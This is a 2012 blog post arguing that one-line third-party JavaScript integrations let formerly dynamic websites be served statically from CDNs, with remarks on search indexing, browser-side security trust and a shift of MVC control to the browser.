Ahti Kitsik
Building develper tools. Python, Java, JavaScript.

writings about @ahtik

The Power of Static Web

By Ahti Kitsik, 29 Mar 2012

Recent web startups often share a common pitch for the integration simplicity : "It only takes 1 line of javascript to integrate with our service!". Disqus, KISSMetrics, Chartbeat, Google Analytics, Facebook, G+ buttons. When was the last time you had to use SERVER-SIDE code to integrate a new service? It's gone. Let me share a few thoughts where I think this trend takes us.

Static CDN serving for "dynamic" websites

Static pregenerated websites behind CDN scale massively better than any php+mysql CMS (wordpress, drupal, joomla).

This has boosted a number of site generators like jekyll. But why now? Why not before?

Because most of the sites had a dynamic element that couldn't be regenerated easily. Comments, mostly.

A few dynamically generated sites have become static by the introduction of Disqus commenting system that sits into browser without any server-side integration. Getting the same level of integration at the server side would bring more complexities - depends on the frameworks, language and version compatibilities.

It does not end with comments. There are "1-liner" shopping carts, chatrooms, customer feedback, customer support, visitor analytics, games. These either complement or integrate with your site and more services appearing rapidly. I hope to see more variety in apps in this field like theming/styling websites dynamically, A/B testing, JavaScript-backed content caching, AWS SimpleDB-like storages for a unified datamodel integration. Turning upside down things that previously had to sit at the server-side.

One step forward with static CDN is javascript-fetched content. This is already happening - browser JavaScript is used to fetch content for the website. But there is a pending problem with this - until about a year ago search engines did not run nor index javascript-fetched content. So the search engines must catch up in order to provide the best search results. The good news is that Google and others are already doing that! They started to run JavaScript with their V8 crawler. But it's no way guaranteed that your JavaScript is neat enough for the V8-powered crawler. In order to keep search relevant they must keep up and start running more and more JavaScript for indexing. It's expensive but to a certain degree we can expect JavaScript-enabled indexing crawlers to take over.

Security

By keeping 3rd party components outside of your server walls your internal systems are better protected from being compromised.
On the other hand this risk is passed on to the end-user by being exploited to any code 3rd party chooses to run in her browser.
Thankfully browsers are relatively safe sandboxes and this security threat is close to visiting any regular website. The main difference being that JavaScript provider (3rd party) can potentially tamper your webpage content and has access to your website user info and page content. So you must trust any 3rd party javascript component 100%. From the security perspective it seems favorable for the service provider to keep 3rd party integration at the browser level.

Power of insight

Browser always sees more about your user than your server because it's closer to the user. Being closer is better.

Browser era MVC

With JavaScript data loading and pushing the widely used server-based Model-View-Controller (MVC) architecture falls apart. At least server is not the Controller it used to be. Browser becomes the new Controller and Server is just one of the Model-providers.

What are other less covered upsides and downsides of moving more action to the browser?

@ahtik is on twitter!